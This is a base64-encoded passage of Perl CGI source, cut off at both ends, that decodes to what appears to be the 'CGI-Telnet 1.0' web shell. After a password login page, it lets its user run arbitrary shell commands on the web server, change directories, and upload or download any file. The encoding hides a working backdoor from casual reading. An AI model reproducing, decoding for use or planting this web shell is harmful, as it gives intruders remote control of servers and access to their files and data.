fXyB8IHwgXyBfXyAgICBfX18gfCB8Xwp8IHwgICAgfCB8IF9fICAgfCB8ICB8X19fX19ffCAgfCB8ICAgLyBfIFx8IHx8ICdfIFwgIC8gXyBcfCBfX3wKfCBcX18vXHwgfF9cIFwgX3wgfF8gICAgICAgICAgIHwgfCAgfCAgX18vfCB8fCB8IHwgfHwgIF9fL3wgfF8KIFxfX19fLyBcX19fXy8gXF9fXy8gICAgICAgICAgIFxfLyAgIFxfX198fF98fF98IHxffCBcX19ffCBcX198IDEuMAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAo8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiAgICAgICAgICAgICAgICAgICAgICBfX19fX18gICAgICAgICAgICAgPC9mb250Pjxmb250IGNvbG9yPSIjQUU4MzAwIj7CqSAyMDAxLCBSb2hpdGFiIEJhdHJhPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4KICAgICAgICAgICAgICAgICAgIC4tJnF1b3Q7ICAgICAgJnF1b3Q7LS4KICAgICAgICAgICAgICAgICAgLyAgICAgICAgICAgIFwKICAgICAgICAgICAgICAgICB8ICAgICAgICAgICAgICB8CiAgICAgICAgICAgICAgICAgfCwgIC4tLiAgLi0uICAsfAogICAgICAgICAgICAgICAgIHwgKShfby8gIFxvXykoIHwKICAgICAgICAgICAgICAgICB8LyAgICAgL1wgICAgIFx8CiAgICAgICAoQF8gICAgICAgKF8gICAgIF5eICAgICBfKQogIF8gICAgICkgXDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+XDwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X188L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPnxJSUlJSUl8PC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5fXzwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+LzwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+X19fX19fX19fX19fX19fX19fX19fX18KPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj4gKF8pPC9mb250Pjxmb250IGNvbG9yPSIjODA4MDgwIj5AOEA4PC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj57fTwvZm9udD48Zm9udCBjb2xvcj0iIzgwODA4MCI+Jmx0O19fX19fX19fPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIj58LVxJSUlJSUkvLXw8L2ZvbnQ+PGZvbnQgY29sb3I9IiM4MDgwODAiPl9fX19fX19fX19fX19fX19fX19fX19fXyZndDs8L2ZvbnQ+PGZvbnQgY29sb3I9IiNGRjAwMDAiPgogICAgICAgIClfLyAgICAgICAgXCAgICAgICAgICAvIAogICAgICAgKEAgICAgICAgICAgIGAtLS0tLS0tLWAKICAgICAgICAgICAgIDwvZm9udD48Zm9udCBjb2xvcj0iI0FFODMwMCI+VyBBIFIgTiBJIE4gRzogUHJpdmF0ZSBTZXJ2ZXI8L2ZvbnQ+PC9wcmU+CiQ7CiMnCglwcmludCA8PEVORDsKPGNvZGU+ClRyeWluZyAkU2VydmVyTmFtZS4uLjxicj4KQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPGJyPgpFc2NhcGUgY2hhcmFjdGVyIGlzIF5dCjxjb2RlPiRNZXNzYWdlCkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQp7CglwcmludCA8PEVORDsKPGNvZGU+Cjxicj5sb2dpbjogYWRtaW48YnI+CnBhc3N3b3JkOjxicj4KTG9naW4gaW5jb3JyZWN0PGJyPjxicj4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9naW5Gb3JtCnsKCXByaW50IDw8RU5EOwo8Y29kZT4KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlvbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+CmxvZ2luOiBhZG1pbjxicj4KcGFzc3dvcmQ6PGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4KPC9mb3JtPgo8L2NvZGU+CkVORAp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUHJpbnRzIHRoZSBmb290ZXIgZm9yIHRoZSBIVE1MIFBhZ2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlRm9vdGVyCnsKCXByaW50ICI8L2ZvbnQ+PC9ib2R5PjwvaHRtbD4iOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNhbiBiZSBhY2Nlc3NlcyB1c2luZyB0aGUKIyB2YXJpYWJsZSAkQ29va2llc3snJ30KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgR2V0Q29va2llcwp7CglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOwoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2llcykKCXsKCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7CgkJJENvb2tpZXN7JGlkfSA9ICR2YWw7Cgl9Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIHNjcmVlbiB3aGVuIHRoZSB1c2VyIGxvZ3Mgb3V0CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50TG9nb3V0U2NyZWVuCnsKCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3NlZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIExvZ3Mgb3V0IHRoZSB1c2VyIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gbG9naW4gYWdhaW4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUGVyZm9ybUxvZ291dAp7CglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llCgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkmUHJpbnRMb2dvdXRTY3JlZW47CgkmUHJpbnRMb2dpblNjcmVlbjsKCSZQcmludExvZ2luRm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0CiMgZGlzcGxheXMgYSBwYWdlIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHJ1biBjb21tYW5kcy4gSWYgdGhlIHBhc3N3b3JkIGRvZW5zJ3QKIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIKIyB0byBsb2dpbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQZXJmb3JtTG9naW4gCnsKCWlmKCRMb2dpblBhc3N3b3JkIGVxICRQYXNzd29yZCkgIyBwYXNzd29yZCBtYXRjaGVkCgl7CgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJwIik7CgkJJlByaW50TG9naW5TY3JlZW47CgkJaWYoJExvZ2luUGFzc3dvcmQgbmUgIiIpICMgc29tZSBwYXNzd29yZCB3YXMgZW50ZXJlZAoJCXsKCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOwoJCX0KCQkmUHJpbnRMb2dpbkZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIGVudGVyIGNvbW1hbmRzCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFuZCI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CiRQcm9tcHQKPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRW50ZXIiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBkb3dubG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVEb3dubG9hZEZvcm0KewoJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CglwcmludCA8PEVORDsKPGNvZGU+Cjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPgo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iZG93bmxvYWQiPgokUHJvbXB0IGRvd25sb2FkPGJyPjxicj4KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4KRG93bmxvYWQ6IDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjwvZm9ybT4KPC9jb2RlPgpFTkQKfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBmb3JtIHRoYXQgYWxsb3dzIHRoZSB1c2VyIHRvIHVwbG9hZCBmaWxlcwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludEZpbGVVcGxvYWRGb3JtCnsKCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVyTmFtZSAkQ3VycmVudERpcl1cJCAiOwoJcHJpbnQgPDxFTkQ7Cjxjb2RlPgo8Zm9ybSBuYW1lPSJmIiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4KJFByb21wdCB1cGxvYWQ8YnI+PGJyPgpGaWxlbmFtZTogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImYiIHNpemU9IjM1Ij48YnI+PGJyPgpPcHRpb25zOiAmbmJzcDs8aW5wdXQgdHlwZT0iY2hlY2tib3giIG5hbWU9Im8iIHZhbHVlPSJvdmVyd3JpdGUiPgpPdmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4KVXBsb2FkOiZuYnNwOyZuYnNwOyZuYnNwOzxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJCZWdpbiI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImQiIHZhbHVlPSIkQ3VycmVudERpciI+CjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJ1cGxvYWQiPgo8L2Zvcm0+CjwvY29kZT4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB3aGVuIHRoZSB0aW1lb3V0IGZvciBhIGNvbW1hbmQgZXhwaXJlcy4gV2UgbmVlZCB0bwojIHRlcm1pbmF0ZSB0aGUgc2NyaXB0IGltbWVkaWF0ZWx5LiBUaGlzIGZ1bmN0aW9uIGlzIHZhbGlkIG9ubHkgb24gVW5peC4gSXQgaXMKIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0Kc3ViIENvbW1hbmRUaW1lb3V0CnsKCWlmKCEkV2luTlQpCgl7CgkJYWxhcm0oMCk7CgkJcHJpbnQgPDxFTkQ7CjwveG1wPgo8Y29kZT4KQ29tbWFuZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25kKHMpLgo8YnI+S2lsbGVkIGl0IQo8Y29kZT4KRU5ECgkJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkJJlByaW50UGFnZUZvb3RlcjsKCQlleGl0OwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQgZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUKIyBjb21tYW5kIGFuZCBhbGxvd3MgdGhlIHVzZXIgdG8gZW50ZXIgYW5vdGhlciBjb21tYW5kLiBUaGUgY2hhbmdlIGRpcmVjdG9yeQojIGNvbW1hbmQgaXMgaGFuZGxlZCBkaWZmZXJlbnRseS4gSW4gdGhpcyBjYXNlLCB0aGUgbmV3IGRpcmVjdG9yeSBpcyBzdG9yZWQgaW4KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRpbWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlCiMgb3V0cHV0IG9mIHRoZSBjaGFuZ2UgZGlyZWN0b3J5IGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZCB0byB0aGUgdXNlcnMKIyB0aGVyZWZvcmUgZXJyb3IgbWVzc2FnZXMgY2Fubm90IGJlIGRpc3BsYXllZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRXhlY3V0ZUNvbW1hbmQKewoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9eXHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZAoJewoJCSMgd2UgY2hhbmdlIHRoZSBkaXJlY3RvcnkgaW50ZXJuYWxseS4gVGhlIG91dHB1dCBvZiB0aGUKCQkjIGNvbW1hbmQgaXMgbm90IGRpc3BsYXllZC4KCQkKCQkkT2xkRGlyID0gJEN1cnJlbnREaXI7CgkJJENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4kQ21kUHdkOwoJCWNob3AoJEN1cnJlbnREaXIgPSBgJENvbW1hbmRgKTsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOwoJCXByaW50ICI8Y29kZT4kUHJvbXB0ICRSdW5Db21tYW5kPC9jb2RlPiI7Cgl9CgllbHNlICMgc29tZSBvdGhlciBjb21tYW5kLCBkaXNwbGF5IHRoZSBvdXRwdXQKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJJFByb21wdCA9ICRXaW5OVCA/ICIkQ3VycmVudERpcj4gIiA6ICJbYWRtaW5cQCRTZXJ2ZXJOYW1lICRDdXJyZW50RGlyXVwkICI7CgkJcHJpbnQgIjxjb2RlPiRQcm9tcHQgJFJ1bkNvbW1hbmQ8L2NvZGU+PHhtcD4iOwoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnREaXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsKCQlpZighJFdpbk5UKQoJCXsKCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsKCQkJYWxhcm0oJENvbW1hbmRUaW1lb3V0RHVyYXRpb24pOwoJCX0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBvdXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkCgkJewoJCQkkfD0xOwoJCQkkQ29tbWFuZCAuPSAiIHwiOwoJCQlvcGVuKENvbW1hbmRPdXRwdXQsICRDb21tYW5kKTsKCQkJd2hpbGUoPENvbW1hbmRPdXRwdXQ+KQoJCQl7CgkJCQkkXyA9fiBzLyhcbnxcclxuKSQvLzsKCQkJCXByaW50ICIkX1xuIjsKCQkJfQoJCQkkfD0wOwoJCX0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29tbWFuZCBjb21wbGV0ZXMKCQl7CgkJCXByaW50IGAkQ29tbWFuZGA7CgkJfQoJCWlmKCEkV2luTlQpCgkJewoJCQlhbGFybSgwKTsKCQl9CgkJcHJpbnQgIjwveG1wPiI7Cgl9CgkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsKCSZQcmludFBhZ2VGb290ZXI7Cn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQgY29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcgojIHRvIGRvd25sb2FkIHRoZSBzcGVjaWZpZWQgZmlsZS4gVGhlIHBhZ2UgYWxzbyBjb250YWlucyBhIGF1dG8tcmVmcmVzaAojIGZlYXR1cmUgdGhhdCBzdGFydHMgdGhlIGRvd25sb2FkIGF1dG9tYXRpY2FsbHkuCiMgQXJndW1lbnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2FkZWQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnREb3dubG9hZExpbmtQYWdlCnsKCWxvY2FsKCRGaWxlVXJsKSA9IEBfOwoJaWYoLWUgJEZpbGVVcmwpICMgaWYgdGhlIGZpbGUgZXhpc3RzCgl7CgkJIyBlbmNvZGUgdGhlIGZpbGUgbGluayBzbyB3ZSBjYW4gc2VuZCBpdCB0byB0aGUgYnJvd3NlcgoJCSRGaWxlVXJsID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCQkkRG93bmxvYWRMaW5rID0gIiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmY9JEZpbGVVcmwmbz1nbyI7CgkJJEh0bWxNZXRhSGVhZGVyID0gIjxtZXRhIEhUVFAtRVFVSVY9XCJSZWZyZXNoXCIgQ09OVEVOVD1cIjE7IFVSTD0kRG93bmxvYWRMaW5rXCI+IjsKCQkmUHJpbnRQYWdlSGVhZGVyKCJjIik7CgkJcHJpbnQgPDxFTkQ7Cjxjb2RlPgpTZW5kaW5nIEZpbGUgJFRyYW5zZmVyRmlsZS4uLjxicj4KSWYgdGhlIGRvd25sb2FkIGRvZXMgbm90IHN0YXJ0IGF1dG9tYXRpY2FsbHksCjxhIGhyZWY9IiREb3dubG9hZExpbmsiPkNsaWNrIEhlcmU8L2E+Lgo8L2NvZGU+CkVORAoJCSZQcmludENvbW1hbmRMaW5lSW5wdXRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7Cgl9CgllbHNlICMgZmlsZSBkb2Vzbid0IGV4aXN0Cgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCXByaW50ICI8Y29kZT5GYWlsZWQgdG8gZG93bmxvYWQgJEZpbGVVcmw6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiByZWFkcyB0aGUgc3BlY2lmaWVkIGZpbGUgZnJvbSB0aGUgZGlzayBhbmQgc2VuZHMgaXQgdG8gdGhlCiMgYnJvd3Nlciwgc28gdGhhdCBpdCBjYW4gYmUgZG93bmxvYWRlZCBieSB0aGUgdXNlci4KIyBBcmd1bWVudCAxOiBGdWxseSBxdWFsaWZpZWQgcGF0aG5hbWUgb2YgdGhlIGZpbGUgdG8gYmUgc2VudC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgU2VuZEZpbGVUb0Jyb3dzZXIKewoJbG9jYWwoJFNlbmRGaWxlKSA9IEBfOwoJaWYob3BlbihTRU5ERklMRSwgJFNlbmRGaWxlKSkgIyBmaWxlIG9wZW5lZCBmb3IgcmVhZGluZwoJewoJCWlmKCRXaW5OVCkKCQl7CgkJCWJpbm1vZGUoU0VOREZJTEUpOwoJCQliaW5tb2RlKFNURE9VVCk7CgkJfQoJCSRGaWxlU2l6ZSA9IChzdGF0KCRTZW5kRmlsZSkpWzddOwoJCSgkRmlsZW5hbWUgPSAkU2VuZEZpbGUpID1+ICBtIShbXi9eXFxdKikkITsKCQlwcmludCAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXVua25vd25cbiI7CgkJcHJpbnQgIkNvbnRlbnQtTGVuZ3RoOiAkRmlsZVNpemVcbiI7CgkJcHJpbnQgIkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSQxXG5cbiI7CgkJcHJpbnQgd2hpbGUoPFNFTkRGSUxFPik7CgkJY2xvc2UoU0VOREZJTEUpOwoJfQoJZWxzZSAjIGZhaWxlZCB0byBvcGVuIGZpbGUKCXsKCQkmUHJpbnRQYWdlSGVhZGVyKCJmIik7CgkJcHJpbnQgIjxjb2RlPkZhaWxlZCB0byBkb3dubG9hZCAkU2VuZEZpbGU6ICQhPC9jb2RlPiI7CgkJJlByaW50RmlsZURvd25sb2FkRm9ybTsKCQkmUHJpbnRQYWdlRm9vdGVyOwoJfQp9CgoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFRoaXMgZnVuY3Rpb24gaXMgY2FsbGVkIHdoZW4gdGhlIHVzZXIgZG93bmxvYWRzIGEgZmlsZS4gSXQgZGlzcGxheXMgYSBtZXNzYWdlCiMgdG8gdGhlIHVzZXIgYW5kIHByb3ZpZGVzIGEgbGluayB0aHJvdWdoIHdoaWNoIHRoZSBmaWxlIGNhbiBiZSBkb3dubG9hZGVkLgojIFRoaXMgZnVuY3Rpb24gaXMgYWxzbyBjYWxsZWQgd2hlbiB0aGUgdXNlciBjbGlja3Mgb24gdGhhdCBsaW5rLiBJbiB0aGlzIGNhc2UsCiMgdGhlIGZpbGUgaXMgcmVhZCBhbmQgc2VudCB0byB0aGUgYnJvd3Nlci4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgQmVnaW5Eb3dubG9hZAp7CgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkV